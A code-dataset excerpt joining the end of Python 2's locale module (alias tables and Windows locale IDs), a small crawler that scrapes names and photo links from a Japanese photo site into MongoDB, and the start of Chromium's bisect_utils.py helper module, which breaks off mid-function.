'no_NO.ISO8859-15', 'norwegian': 'no_NO.ISO8859-1', 'norwegian.iso88591': 'no_NO.ISO8859-1', 'nr': 'nr_ZA.ISO8859-1', 'nr_za': 'nr_ZA.ISO8859-1', 'nr_za.iso88591': 'nr_ZA.ISO8859-1', 'nso': 'nso_ZA.ISO8859-15', 'nso_za': 'nso_ZA.ISO8859-15', 'nso_za.iso885915': 'nso_ZA.ISO8859-15', 'ny': 'ny_NO.ISO8859-1', 'ny_no': 'ny_NO.ISO8859-1', 'ny_no.88591': 'ny_NO.ISO8859-1', 'ny_no.iso88591': 'ny_NO.ISO8859-1', 'ny_no.iso885915': 'ny_NO.ISO8859-15', 'ny_no@euro': 'ny_NO.ISO8859-15', 'nynorsk': 'nn_NO.ISO8859-1', 'oc': 'oc_FR.ISO8859-1', 'oc_fr': 'oc_FR.ISO8859-1', 'oc_fr.iso88591': 'oc_FR.ISO8859-1', 'oc_fr.iso885915': 'oc_FR.ISO8859-15', 'oc_fr@euro': 'oc_FR.ISO8859-15', 'or': 'or_IN.UTF-8', 'pa': 'pa_IN.UTF-8', 'pa_in': 'pa_IN.UTF-8', 'pd': 'pd_US.ISO8859-1', 'pd_de': 'pd_DE.ISO8859-1', 'pd_de.iso88591': 'pd_DE.ISO8859-1', 'pd_de.iso885915': 'pd_DE.ISO8859-15', 'pd_de@euro': 'pd_DE.ISO8859-15', 'pd_us': 'pd_US.ISO8859-1', 'pd_us.iso88591': 'pd_US.ISO8859-1', 'pd_us.iso885915': 'pd_US.ISO8859-15', 'pd_us@euro': 'pd_US.ISO8859-15', 'ph': 'ph_PH.ISO8859-1', 'ph_ph': 'ph_PH.ISO8859-1', 'ph_ph.iso88591': 'ph_PH.ISO8859-1', 'pl': 'pl_PL.ISO8859-2', 'pl_pl': 'pl_PL.ISO8859-2', 'pl_pl.iso88592': 'pl_PL.ISO8859-2', 'polish': 'pl_PL.ISO8859-2', 'portuguese': 'pt_PT.ISO8859-1', 'portuguese.iso88591': 'pt_PT.ISO8859-1', 'portuguese_brazil': 'pt_BR.ISO8859-1', 'portuguese_brazil.8859': 'pt_BR.ISO8859-1', 'posix': 'C', 'posix-utf2': 'C', 'pp': 'pp_AN.ISO8859-1', 'pp_an': 'pp_AN.ISO8859-1', 'pp_an.iso88591': 'pp_AN.ISO8859-1', 'pt': 'pt_PT.ISO8859-1', 'pt.iso885915': 'pt_PT.ISO8859-15', 'pt_br': 'pt_BR.ISO8859-1', 'pt_br.88591': 'pt_BR.ISO8859-1', 'pt_br.iso88591': 'pt_BR.ISO8859-1', 'pt_br.iso885915': 'pt_BR.ISO8859-15', 'pt_br@euro': 'pt_BR.ISO8859-15', 'pt_pt': 'pt_PT.ISO8859-1', 'pt_pt.88591': 'pt_PT.ISO8859-1', 'pt_pt.iso88591': 'pt_PT.ISO8859-1', 'pt_pt.iso885915': 'pt_PT.ISO8859-15', 'pt_pt.iso885915@euro': 'pt_PT.ISO8859-15', 'pt_pt.utf8@euro': 'pt_PT.UTF-8', 'pt_pt@euro': 'pt_PT.ISO8859-15', 'ro': 'ro_RO.ISO8859-2', 'ro_ro': 'ro_RO.ISO8859-2', 'ro_ro.iso88592': 'ro_RO.ISO8859-2', 'romanian': 'ro_RO.ISO8859-2', 'ru': 'ru_RU.UTF-8', 'ru.koi8r': 'ru_RU.KOI8-R', 'ru_ru': 'ru_RU.UTF-8', 'ru_ru.cp1251': 'ru_RU.CP1251', 'ru_ru.iso88595': 'ru_RU.ISO8859-5', 'ru_ru.koi8r': 'ru_RU.KOI8-R', 'ru_ru.microsoftcp1251': 'ru_RU.CP1251', 'ru_ua': 'ru_UA.KOI8-U', 'ru_ua.cp1251': 'ru_UA.CP1251', 'ru_ua.koi8u': 'ru_UA.KOI8-U', 'ru_ua.microsoftcp1251': 'ru_UA.CP1251', 'rumanian': 'ro_RO.ISO8859-2', 'russian': 'ru_RU.ISO8859-5', 'rw': 'rw_RW.ISO8859-1', 'rw_rw': 'rw_RW.ISO8859-1', 'rw_rw.iso88591': 'rw_RW.ISO8859-1', 'sd': 'sd_IN@devanagari.UTF-8', 'se_no': 'se_NO.UTF-8', 'serbocroatian': 'sr_RS.UTF-8@latin', 'sh': 'sr_RS.UTF-8@latin', 'sh_ba.iso88592@bosnia': 'sr_CS.ISO8859-2', 'sh_hr': 'sh_HR.ISO8859-2', 'sh_hr.iso88592': 'hr_HR.ISO8859-2', 'sh_sp': 'sr_CS.ISO8859-2', 'sh_yu': 'sr_RS.UTF-8@latin', 'si': 'si_LK.UTF-8', 'si_lk': 'si_LK.UTF-8', 'sinhala': 'si_LK.UTF-8', 'sk': 'sk_SK.ISO8859-2', 'sk_sk': 'sk_SK.ISO8859-2', 'sk_sk.iso88592': 'sk_SK.ISO8859-2', 'sl': 'sl_SI.ISO8859-2', 'sl_cs': 'sl_CS.ISO8859-2', 'sl_si': 'sl_SI.ISO8859-2', 'sl_si.iso88592': 'sl_SI.ISO8859-2', 'slovak': 'sk_SK.ISO8859-2', 'slovene': 'sl_SI.ISO8859-2', 'slovenian': 'sl_SI.ISO8859-2', 'sp': 'sr_CS.ISO8859-5', 'sp_yu': 'sr_CS.ISO8859-5', 'spanish': 'es_ES.ISO8859-1', 'spanish.iso88591': 'es_ES.ISO8859-1', 'spanish_spain': 'es_ES.ISO8859-1', 'spanish_spain.8859': 'es_ES.ISO8859-1', 'sq': 'sq_AL.ISO8859-2', 'sq_al': 'sq_AL.ISO8859-2', 'sq_al.iso88592': 'sq_AL.ISO8859-2', 'sr': 'sr_RS.UTF-8', 'sr@cyrillic': 'sr_RS.UTF-8', 'sr@latin': 'sr_RS.UTF-8@latin', 'sr@latn': 'sr_RS.UTF-8@latin', 'sr_cs': 'sr_RS.UTF-8', 'sr_cs.iso88592': 'sr_CS.ISO8859-2', 'sr_cs.iso88592@latn': 'sr_CS.ISO8859-2', 'sr_cs.iso88595': 'sr_CS.ISO8859-5', 'sr_cs.utf8@latn': 'sr_RS.UTF-8@latin', 'sr_cs@latn': 'sr_RS.UTF-8@latin', 'sr_me': 'sr_ME.UTF-8', 'sr_rs': 'sr_RS.UTF-8', 'sr_rs.utf8@latn': 'sr_RS.UTF-8@latin', 'sr_rs@latin': 'sr_RS.UTF-8@latin', 'sr_rs@latn': 'sr_RS.UTF-8@latin', 'sr_sp': 'sr_CS.ISO8859-2', 'sr_yu': 'sr_RS.UTF-8@latin', 'sr_yu.cp1251@cyrillic': 'sr_CS.CP1251', 'sr_yu.iso88592': 'sr_CS.ISO8859-2', 'sr_yu.iso88595': 'sr_CS.ISO8859-5', 'sr_yu.iso88595@cyrillic': 'sr_CS.ISO8859-5', 'sr_yu.microsoftcp1251@cyrillic': 'sr_CS.CP1251', 'sr_yu.utf8@cyrillic': 'sr_RS.UTF-8', 'sr_yu@cyrillic': 'sr_RS.UTF-8', 'ss': 'ss_ZA.ISO8859-1', 'ss_za': 'ss_ZA.ISO8859-1', 'ss_za.iso88591': 'ss_ZA.ISO8859-1', 'st': 'st_ZA.ISO8859-1', 'st_za': 'st_ZA.ISO8859-1', 'st_za.iso88591': 'st_ZA.ISO8859-1', 'sv': 'sv_SE.ISO8859-1', 'sv.iso885915': 'sv_SE.ISO8859-15', 'sv_fi': 'sv_FI.ISO8859-1', 'sv_fi.iso88591': 'sv_FI.ISO8859-1', 'sv_fi.iso885915': 'sv_FI.ISO8859-15', 'sv_fi.iso885915@euro': 'sv_FI.ISO8859-15', 'sv_fi.utf8@euro': 'sv_FI.UTF-8', 'sv_fi@euro': 'sv_FI.ISO8859-15', 'sv_se': 'sv_SE.ISO8859-1', 'sv_se.88591': 'sv_SE.ISO8859-1', 'sv_se.iso88591': 'sv_SE.ISO8859-1', 'sv_se.iso885915': 'sv_SE.ISO8859-15', 'sv_se@euro': 'sv_SE.ISO8859-15', 'swedish': 'sv_SE.ISO8859-1', 'swedish.iso88591': 'sv_SE.ISO8859-1', 'ta': 'ta_IN.TSCII-0', 'ta_in': 'ta_IN.TSCII-0', 'ta_in.tscii': 'ta_IN.TSCII-0', 'ta_in.tscii0': 'ta_IN.TSCII-0', 'te': 'te_IN.UTF-8', 'tg': 'tg_TJ.KOI8-C', 'tg_tj': 'tg_TJ.KOI8-C', 'tg_tj.koi8c': 'tg_TJ.KOI8-C', 'th': 'th_TH.ISO8859-11', 'th_th': 'th_TH.ISO8859-11', 'th_th.iso885911': 'th_TH.ISO8859-11', 'th_th.tactis': 'th_TH.TIS620', 'th_th.tis620': 'th_TH.TIS620', 'thai': 'th_TH.ISO8859-11', 'tl': 'tl_PH.ISO8859-1', 'tl_ph': 'tl_PH.ISO8859-1', 'tl_ph.iso88591': 'tl_PH.ISO8859-1', 'tn': 'tn_ZA.ISO8859-15', 'tn_za': 'tn_ZA.ISO8859-15', 'tn_za.iso885915': 'tn_ZA.ISO8859-15', 'tr': 'tr_TR.ISO8859-9', 'tr_tr': 'tr_TR.ISO8859-9', 'tr_tr.iso88599': 'tr_TR.ISO8859-9', 'ts': 'ts_ZA.ISO8859-1', 'ts_za': 'ts_ZA.ISO8859-1', 'ts_za.iso88591': 'ts_ZA.ISO8859-1', 'tt': 'tt_RU.TATAR-CYR', 'tt_ru': 'tt_RU.TATAR-CYR', 'tt_ru.koi8c': 'tt_RU.KOI8-C', 'tt_ru.tatarcyr': 'tt_RU.TATAR-CYR', 'turkish': 'tr_TR.ISO8859-9', 'turkish.iso88599': 'tr_TR.ISO8859-9', 'uk': 'uk_UA.KOI8-U', 'uk_ua': 'uk_UA.KOI8-U', 'uk_ua.cp1251': 'uk_UA.CP1251', 'uk_ua.iso88595': 'uk_UA.ISO8859-5', 'uk_ua.koi8u': 'uk_UA.KOI8-U', 'uk_ua.microsoftcp1251': 'uk_UA.CP1251', 'univ': 'en_US.utf', 'universal': 'en_US.utf', 'universal.utf8@ucs4': 'en_US.UTF-8', 'ur': 'ur_PK.CP1256', 'ur_pk': 'ur_PK.CP1256', 'ur_pk.cp1256': 'ur_PK.CP1256', 'ur_pk.microsoftcp1256': 'ur_PK.CP1256', 'uz': 'uz_UZ.UTF-8', 'uz_uz': 'uz_UZ.UTF-8', 'uz_uz.iso88591': 'uz_UZ.ISO8859-1', 'uz_uz.utf8@cyrillic': 'uz_UZ.UTF-8', 'uz_uz@cyrillic': 'uz_UZ.UTF-8', 've': 've_ZA.UTF-8', 've_za': 've_ZA.UTF-8', 'vi': 'vi_VN.TCVN', 'vi_vn': 'vi_VN.TCVN', 'vi_vn.tcvn': 'vi_VN.TCVN', 'vi_vn.tcvn5712': 'vi_VN.TCVN', 'vi_vn.viscii': 'vi_VN.VISCII', 'vi_vn.viscii111': 'vi_VN.VISCII', 'wa': 'wa_BE.ISO8859-1', 'wa_be': 'wa_BE.ISO8859-1', 'wa_be.iso88591': 'wa_BE.ISO8859-1', 'wa_be.iso885915': 'wa_BE.ISO8859-15', 'wa_be.iso885915@euro': 'wa_BE.ISO8859-15', 'wa_be@euro': 'wa_BE.ISO8859-15', 'xh': 'xh_ZA.ISO8859-1', 'xh_za': 'xh_ZA.ISO8859-1', 'xh_za.iso88591': 'xh_ZA.ISO8859-1', 'yi': 'yi_US.CP1255', 'yi_us': 'yi_US.CP1255', 'yi_us.cp1255': 'yi_US.CP1255', 'yi_us.microsoftcp1255': 'yi_US.CP1255', 'zh': 'zh_CN.eucCN', 'zh_cn': 'zh_CN.gb2312', 'zh_cn.big5': 'zh_TW.big5', 'zh_cn.euc': 'zh_CN.eucCN', 'zh_cn.gb18030': 'zh_CN.gb18030', 'zh_cn.gb2312': 'zh_CN.gb2312', 'zh_cn.gbk': 'zh_CN.gbk', 'zh_hk': 'zh_HK.big5hkscs', 'zh_hk.big5': 'zh_HK.big5', 'zh_hk.big5hk': 'zh_HK.big5hkscs', 'zh_hk.big5hkscs': 'zh_HK.big5hkscs', 'zh_tw': 'zh_TW.big5', 'zh_tw.big5': 'zh_TW.big5', 'zh_tw.euc': 'zh_TW.eucTW', 'zh_tw.euctw': 'zh_TW.eucTW', 'zu': 'zu_ZA.ISO8859-1', 'zu_za': 'zu_ZA.ISO8859-1', 'zu_za.iso88591': 'zu_ZA.ISO8859-1', } # # This maps Windows language identifiers to locale strings. # # This list has been updated from # http://msdn.microsoft.com/library/default.asp?url=/library/en-us/intl/nls_238z.asp # to include every locale up to Windows Vista. # # NOTE: this mapping is incomplete. If your language is missing, please # submit a bug report to Python bug manager, which you can find via: # http://www.python.org/dev/ # Make sure you include the missing language identifier and the suggested # locale code. # windows_locale = { 0x0436: "af_ZA", # Afrikaans 0x041c: "sq_AL", # Albanian 0x0484: "gsw_FR",# Alsatian - France 0x045e: "am_ET", # Amharic - Ethiopia 0x0401: "ar_SA", # Arabic - Saudi Arabia 0x0801: "ar_IQ", # Arabic - Iraq 0x0c01: "ar_EG", # Arabic - Egypt 0x1001: "ar_LY", # Arabic - Libya 0x1401: "ar_DZ", # Arabic - Algeria 0x1801: "ar_MA", # Arabic - Morocco 0x1c01: "ar_TN", # Arabic - Tunisia 0x2001: "ar_OM", # Arabic - Oman 0x2401: "ar_YE", # Arabic - Yemen 0x2801: "ar_SY", # Arabic - Syria 0x2c01: "ar_JO", # Arabic - Jordan 0x3001: "ar_LB", # Arabic - Lebanon 0x3401: "ar_KW", # Arabic - Kuwait 0x3801: "ar_AE", # Arabic - United Arab Emirates 0x3c01: "ar_BH", # Arabic - Bahrain 0x4001: "ar_QA", # Arabic - Qatar 0x042b: "hy_AM", # Armenian 0x044d: "as_IN", # Assamese - India 0x042c: "az_AZ", # Azeri - Latin 0x082c: "az_AZ", # Azeri - Cyrillic 0x046d: "ba_RU", # Bashkir 0x042d: "eu_ES", # Basque - Russia 0x0423: "be_BY", # Belarusian 0x0445: "bn_IN", # Begali 0x201a: "bs_BA", # Bosnian - Cyrillic 0x141a: "bs_BA", # Bosnian - Latin 0x047e: "br_FR", # Breton - France 0x0402: "bg_BG", # Bulgarian # 0x0455: "my_MM", # Burmese - Not supported 0x0403: "ca_ES", # Catalan 0x0004: "zh_CHS",# Chinese - Simplified 0x0404: "zh_TW", # Chinese - Taiwan 0x0804: "zh_CN", # Chinese - PRC 0x0c04: "zh_HK", # Chinese - Hong Kong S.A.R. 0x1004: "zh_SG", # Chinese - Singapore 0x1404: "zh_MO", # Chinese - Macao S.A.R. 0x7c04: "zh_CHT",# Chinese - Traditional 0x0483: "co_FR", # Corsican - France 0x041a: "hr_HR", # Croatian 0x101a: "hr_BA", # Croatian - Bosnia 0x0405: "cs_CZ", # Czech 0x0406: "da_DK", # Danish 0x048c: "gbz_AF",# Dari - Afghanistan 0x0465: "div_MV",# Divehi - Maldives 0x0413: "nl_NL", # Dutch - The Netherlands 0x0813: "nl_BE", # Dutch - Belgium 0x0409: "en_US", # English - United States 0x0809: "en_GB", # English - United Kingdom 0x0c09: "en_AU", # English - Australia 0x1009: "en_CA", # English - Canada 0x1409: "en_NZ", # English - New Zealand 0x1809: "en_IE", # English - Ireland 0x1c09: "en_ZA", # English - South Africa 0x2009: "en_JA", # English - Jamaica 0x2409: "en_CB", # English - Carribbean 0x2809: "en_BZ", # English - Belize 0x2c09: "en_TT", # English - Trinidad 0x3009: "en_ZW", # English - Zimbabwe 0x3409: "en_PH", # English - Philippines 0x4009: "en_IN", # English - India 0x4409: "en_MY", # English - Malaysia 0x4809: "en_IN", # English - Singapore 0x0425: "et_EE", # Estonian 0x0438: "fo_FO", # Faroese 0x0464: "fil_PH",# Filipino 0x040b: "fi_FI", # Finnish 0x040c: "fr_FR", # French - France 0x080c: "fr_BE", # French - Belgium 0x0c0c: "fr_CA", # French - Canada 0x100c: "fr_CH", # French - Switzerland 0x140c: "fr_LU", # French - Luxembourg 0x180c: "fr_MC", # French - Monaco 0x0462: "fy_NL", # Frisian - Netherlands 0x0456: "gl_ES", # Galician 0x0437: "ka_GE", # Georgian 0x0407: "de_DE", # German - Germany 0x0807: "de_CH", # German - Switzerland 0x0c07: "de_AT", # German - Austria 0x1007: "de_LU", # German - Luxembourg 0x1407: "de_LI", # German - Liechtenstein 0x0408: "el_GR", # Greek 0x046f: "kl_GL", # Greenlandic - Greenland 0x0447: "gu_IN", # Gujarati 0x0468: "ha_NG", # Hausa - Latin 0x040d: "he_IL", # Hebrew 0x0439: "hi_IN", # Hindi 0x040e: "hu_HU", # Hungarian 0x040f: "is_IS", # Icelandic 0x0421: "id_ID", # Indonesian 0x045d: "iu_CA", # Inuktitut - Syllabics 0x085d: "iu_CA", # Inuktitut - Latin 0x083c: "ga_IE", # Irish - Ireland 0x0410: "it_IT", # Italian - Italy 0x0810: "it_CH", # Italian - Switzerland 0x0411: "ja_JP", # Japanese 0x044b: "kn_IN", # Kannada - India 0x043f: "kk_KZ", # Kazakh 0x0453: "kh_KH", # Khmer - Cambodia 0x0486: "qut_GT",# K'iche - Guatemala 0x0487: "rw_RW", # Kinyarwanda - Rwanda 0x0457: "kok_IN",# Konkani 0x0412: "ko_KR", # Korean 0x0440: "ky_KG", # Kyrgyz 0x0454: "lo_LA", # Lao - Lao PDR 0x0426: "lv_LV", # Latvian 0x0427: "lt_LT", # Lithuanian 0x082e: "dsb_DE",# Lower Sorbian - Germany 0x046e: "lb_LU", # Luxembourgish 0x042f: "mk_MK", # FYROM Macedonian 0x043e: "ms_MY", # Malay - Malaysia 0x083e: "ms_BN", # Malay - Brunei Darussalam 0x044c: "ml_IN", # Malayalam - India 0x043a: "mt_MT", # Maltese 0x0481: "mi_NZ", # Maori 0x047a: "arn_CL",# Mapudungun 0x044e: "mr_IN", # Marathi 0x047c: "moh_CA",# Mohawk - Canada 0x0450: "mn_MN", # Mongolian - Cyrillic 0x0850: "mn_CN", # Mongolian - PRC 0x0461: "ne_NP", # Nepali 0x0414: "nb_NO", # Norwegian - Bokmal 0x0814: "nn_NO", # Norwegian - Nynorsk 0x0482: "oc_FR", # Occitan - France 0x0448: "or_IN", # Oriya - India 0x0463: "ps_AF", # Pashto - Afghanistan 0x0429: "fa_IR", # Persian 0x0415: "pl_PL", # Polish 0x0416: "pt_BR", # Portuguese - Brazil 0x0816: "pt_PT", # Portuguese - Portugal 0x0446: "pa_IN", # Punjabi 0x046b: "quz_BO",# Quechua (Bolivia) 0x086b: "quz_EC",# Quechua (Ecuador) 0x0c6b: "quz_PE",# Quechua (Peru) 0x0418: "ro_RO", # Romanian - Romania 0x0417: "rm_CH", # Romansh 0x0419: "ru_RU", # Russian 0x243b: "smn_FI",# Sami Finland 0x103b: "smj_NO",# Sami Norway 0x143b: "smj_SE",# Sami Sweden 0x043b: "se_NO", # Sami Northern Norway 0x083b: "se_SE", # Sami Northern Sweden 0x0c3b: "se_FI", # Sami Northern Finland 0x203b: "sms_FI",# Sami Skolt 0x183b: "sma_NO",# Sami Southern Norway 0x1c3b: "sma_SE",# Sami Southern Sweden 0x044f: "sa_IN", # Sanskrit 0x0c1a: "sr_SP", # Serbian - Cyrillic 0x1c1a: "sr_BA", # Serbian - Bosnia Cyrillic 0x081a: "sr_SP", # Serbian - Latin 0x181a: "sr_BA", # Serbian - Bosnia Latin 0x045b: "si_LK", # Sinhala - Sri Lanka 0x046c: "ns_ZA", # Northern Sotho 0x0432: "tn_ZA", # Setswana - Southern Africa 0x041b: "sk_SK", # Slovak 0x0424: "sl_SI", # Slovenian 0x040a: "es_ES", # Spanish - Spain 0x080a: "es_MX", # Spanish - Mexico 0x0c0a: "es_ES", # Spanish - Spain (Modern) 0x100a: "es_GT", # Spanish - Guatemala 0x140a: "es_CR", # Spanish - Costa Rica 0x180a: "es_PA", # Spanish - Panama 0x1c0a: "es_DO", # Spanish - Dominican Republic 0x200a: "es_VE", # Spanish - Venezuela 0x240a: "es_CO", # Spanish - Colombia 0x280a: "es_PE", # Spanish - Peru 0x2c0a: "es_AR", # Spanish - Argentina 0x300a: "es_EC", # Spanish - Ecuador 0x340a: "es_CL", # Spanish - Chile 0x380a: "es_UR", # Spanish - Uruguay 0x3c0a: "es_PY", # Spanish - Paraguay 0x400a: "es_BO", # Spanish - Bolivia 0x440a: "es_SV", # Spanish - El Salvador 0x480a: "es_HN", # Spanish - Honduras 0x4c0a: "es_NI", # Spanish - Nicaragua 0x500a: "es_PR", # Spanish - Puerto Rico 0x540a: "es_US", # Spanish - United States # 0x0430: "", # Sutu - Not supported 0x0441: "sw_KE", # Swahili 0x041d: "sv_SE", # Swedish - Sweden 0x081d: "sv_FI", # Swedish - Finland 0x045a: "syr_SY",# Syriac 0x0428: "tg_TJ", # Tajik - Cyrillic 0x085f: "tmz_DZ",# Tamazight - Latin 0x0449: "ta_IN", # Tamil 0x0444: "tt_RU", # Tatar 0x044a: "te_IN", # Telugu 0x041e: "th_TH", # Thai 0x0851: "bo_BT", # Tibetan - Bhutan 0x0451: "bo_CN", # Tibetan - PRC 0x041f: "tr_TR", # Turkish 0x0442: "tk_TM", # Turkmen - Cyrillic 0x0480: "ug_CN", # Uighur - Arabic 0x0422: "uk_UA", # Ukrainian 0x042e: "wen_DE",# Upper Sorbian - Germany 0x0420: "ur_PK", # Urdu 0x0820: "ur_IN", # Urdu - India 0x0443: "uz_UZ", # Uzbek - Latin 0x0843: "uz_UZ", # Uzbek - Cyrillic 0x042a: "vi_VN", # Vietnamese 0x0452: "cy_GB", # Welsh 0x0488: "wo_SN", # Wolof - Senegal 0x0434: "xh_ZA", # Xhosa - South Africa 0x0485: "sah_RU",# Yakut - Cyrillic 0x0478: "ii_CN", # Yi - PRC 0x046a: "yo_NG", # Yoruba - Nigeria 0x0435: "zu_ZA", # Zulu } def _print_locale(): """ Test function. """ categories = {} def _init_categories(categories=categories): for k,v in globals().items(): if k[:3] == 'LC_': categories[k] = v _init_categories() del categories['LC_ALL'] print 'Locale defaults as determined by getdefaultlocale():' print '-'*72 lang, enc = getdefaultlocale() print 'Language: ', lang or '(undefined)' print 'Encoding: ', enc or '(undefined)' print print 'Locale settings on startup:' print '-'*72 for name,category in categories.items(): print name, '...' lang, enc = getlocale(category) print ' Language: ', lang or '(undefined)' print ' Encoding: ', enc or '(undefined)' print print print 'Locale settings after calling resetlocale():' print '-'*72 resetlocale() for name,category in categories.items(): print name, '...' lang, enc = getlocale(category) print ' Language: ', lang or '(undefined)' print ' Encoding: ', enc or '(undefined)' print try: setlocale(LC_ALL, "") except: print 'NOTE:' print 'setlocale(LC_ALL, "") does not support the default locale' print 'given in the OS environment variables.' else: print print 'Locale settings after calling setlocale(LC_ALL, ""):' print '-'*72 for name,category in categories.items(): print name, '...' lang, enc = getlocale(category) print ' Language: ', lang or '(undefined)' print ' Encoding: ', enc or '(undefined)' print ### try: LC_MESSAGES except NameError: pass else: __all__.append("LC_MESSAGES") if __name__=='__main__': print 'Locale aliasing:' print _print_locale() print print 'Number formatting:' print _test()
gpl-3.0
mikoim/funstuff
null/crawler/tt2db.py
1
1709
# -*- coding: utf-8 -*- import urllib.request import time import pymongo import http.client import re def httpWrapper(url): try: data_raw = urllib.request.urlopen(url).read().decode('utf-8') except: return "NULL" return data_raw def getGirlName(data_raw): matches = re.findall('名前[ ]+?/[ ]+?(.+?)(|\n)*( |)*(|\n)*( |)*(\(|<br />)', data_raw) for match in matches[0]: return match.replace(' ', '') return def getGrilPhotos(data_raw): matches = re.findall('<span>(photos/.+?.jpg)</span>', data_raw) if len(matches) == 0: matches = re.findall('<a href="(photos/.+?.jpg)">', data_raw) return matches def getLastModTime(path): conn = http.client.HTTPConnection("twintail-japan.com") conn.request("HEAD", path) res = conn.getresponse() return int(time.mktime(time.strptime(res.getheaders()[2][1], '%a, %d %b %Y %H:%M:%S %Z')) * 1000) conn = pymongo.Connection() db = conn.tw2db col = db.tm for x in range(1, 3): baseUrl = "http://twintail-japan.com/sailor/contents/%d.html" % x data_raw = httpWrapper(baseUrl) if data_raw != "NULL": name = getGirlName(data_raw) for photo in getGrilPhotos(data_raw): dbtml = {'author' : '', 'time' : '', 'title' : '', 'via' : '', 'src' : '', 'message' : ''} dbtml['author'] = name dbtml['title'] = name + " @ セーラ服とツインテール" dbtml['via'] = baseUrl dbtml['message'] = "" dbtml['time'] = getLastModTime("/sailor/contents/%d.html" % x) dbtml['src'] = 'http://twintail-japan.com/sailor/contents/%s' % (photo) col.insert(dbtml) print(x)
mit
sencha/chromium-spacewalk
tools/auto_bisect/bisect_utils.py
6
16659
# Copyright 2014 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Utility functions used by the bisect tool. This includes functions related to checking out the depot and outputting annotations for the Buildbot waterfall. """ import errno import imp import os import shutil import stat import subprocess import sys DEFAULT_GCLIENT_CUSTOM_DEPS = { 'src/data/page_cycler': 'https://chrome-internal.googlesource.com/' 'chrome/data/page_cycler/.git', 'src/data/dom_perf': 'https://chrome-internal.googlesource.com/' 'chrome/data/dom_perf/.git', 'src/data/mach_ports': 'https://chrome-internal.googlesource.com/' 'chrome/data/mach_ports/.git', 'src/tools/perf/data': 'https://chrome-internal.googlesource.com/' 'chrome/tools/perf/data/.git', 'src/third_party/adobe/flash/binaries/ppapi/linux': 'https://chrome-internal.googlesource.com/' 'chrome/deps/adobe/flash/binaries/ppapi/linux/.git', 'src/third_party/adobe/flash/binaries/ppapi/linux_x64': 'https://chrome-internal.googlesource.com/' 'chrome/deps/adobe/flash/binaries/ppapi/linux_x64/.git', 'src/third_party/adobe/flash/binaries/ppapi/mac': 'https://chrome-internal.googlesource.com/' 'chrome/deps/adobe/flash/binaries/ppapi/mac/.git', 'src/third_party/adobe/flash/binaries/ppapi/mac_64': 'https://chrome-internal.googlesource.com/' 'chrome/deps/adobe/flash/binaries/ppapi/mac_64/.git', 'src/third_party/adobe/flash/binaries/ppapi/win': 'https://chrome-internal.googlesource.com/' 'chrome/deps/adobe/flash/binaries/ppapi/win/.git', 'src/third_party/adobe/flash/binaries/ppapi/win_x64': 'https://chrome-internal.googlesource.com/' 'chrome/deps/adobe/flash/binaries/ppapi/win_x64/.git', 'src/chrome/tools/test/reference_build/chrome_win': None, 'src/chrome/tools/test/reference_build/chrome_mac': None, 'src/chrome/tools/test/reference_build/chrome_linux': None, 'src/third_party/WebKit/LayoutTests': None, 'src/tools/valgrind': None, } GCLIENT_SPEC_DATA = [ { 'name': 'src', 'url': 'https://chromium.googlesource.com/chromium/src.git', 'deps_file': '.DEPS.git', 'managed': True, 'custom_deps': {}, 'safesync_url': '', }, ] GCLIENT_SPEC_ANDROID = "\ntarget_os = ['android']" GCLIENT_CUSTOM_DEPS_V8 = {'src/v8_bleeding_edge': 'git://github.com/v8/v8.git'} FILE_DEPS_GIT = '.DEPS.git' FILE_DEPS = 'DEPS' REPO_SYNC_COMMAND = ('git checkout -f $(git rev-list --max-count=1 ' '--before=%d remotes/m/master)') # Paths to CrOS-related files. # WARNING(qyearsley, 2014-08-15): These haven't been tested recently. CROS_SDK_PATH = os.path.join('..', 'cros', 'chromite', 'bin', 'cros_sdk') CROS_TEST_KEY_PATH = os.path.join( '..', 'cros', 'chromite', 'ssh_keys', 'testing_rsa') CROS_SCRIPT_KEY_PATH = os.path.join( '..', 'cros', 'src', 'scripts', 'mod_for_test_scripts', 'ssh_keys', 'testing_rsa') REPO_PARAMS = [ 'https://chrome-internal.googlesource.com/chromeos/manifest-internal/', '--repo-url', 'https://git.chromium.org/external/repo.git' ] def OutputAnnotationStepStart(name): """Outputs annotation to signal the start of a step to a trybot. Args: name: The name of the step. """ print print '@@@SEED_STEP %s@@@' % name print '@@@STEP_CURSOR %s@@@' % name print '@@@STEP_STARTED@@@' print sys.stdout.flush() def OutputAnnotationStepClosed(): """Outputs annotation to signal the closing of a step to a trybot.""" print print '@@@STEP_CLOSED@@@' print sys.stdout.flush() def OutputAnnotationStepLink(label, url): """Outputs appropriate annotation to print a link. Args: label: The name to print. url: The url to print. """ print print '@@@STEP_LINK@%s@%s@@@' % (label, url) print sys.stdout.flush() def LoadExtraSrc(path_to_file): """Attempts to load an extra source file, and overrides global values. If the extra source file is loaded successfully, then it will use the new module to override some global values, such as gclient spec data. Args: path_to_file: File path. Returns: The loaded module object, or None if none was imported. """ try: global GCLIENT_SPEC_DATA global GCLIENT_SPEC_ANDROID extra_src = imp.load_source('data', path_to_file) GCLIENT_SPEC_DATA = extra_src.GetGClientSpec() GCLIENT_SPEC_ANDROID = extra_src.GetGClientSpecExtraParams() return extra_src except ImportError: return None def IsTelemetryCommand(command): """Attempts to discern whether or not a given command is running telemetry.""" return ('tools/perf/run_' in command or 'tools\\perf\\run_' in command) def _CreateAndChangeToSourceDirectory(working_directory): """Creates a directory 'bisect' as a subdirectory of |working_directory|. If successful, the current working directory will be changed to the new 'bisect' directory. Args: working_directory: The directory to create the new 'bisect' directory in. Returns: True if the directory was successfully created (or already existed). """ cwd = os.getcwd() os.chdir(working_directory) try: os.mkdir('bisect') except OSError, e: if e.errno != errno.EEXIST: # EEXIST indicates that it already exists. os.chdir(cwd) return False os.chdir('bisect') return True def _SubprocessCall(cmd, cwd=None): """Runs a subprocess with specified parameters. Args: params: A list of parameters to pass to gclient. cwd: Working directory to run from. Returns: The return code of the call. """ if os.name == 'nt': # "HOME" isn't normally defined on windows, but is needed # for git to find the user's .netrc file. if not os.getenv('HOME'): os.environ['HOME'] = os.environ['USERPROFILE'] shell = os.name == 'nt' return subprocess.call(cmd, shell=shell, cwd=cwd) def RunGClient(params, cwd=None): """Runs gclient with the specified parameters. Args: params: A list of parameters to pass to gclient. cwd: Working directory to run from. Returns: The return code of the call. """ cmd = ['gclient'] + params return _SubprocessCall(cmd, cwd=cwd) def SetupCrosRepo(): """Sets up CrOS repo for bisecting ChromeOS. Returns: True if successful, False otherwise. """ cwd = os.getcwd() try: os.mkdir('cros') except OSError as e: if e.errno != errno.EEXIST: # EEXIST means the directory already exists. return 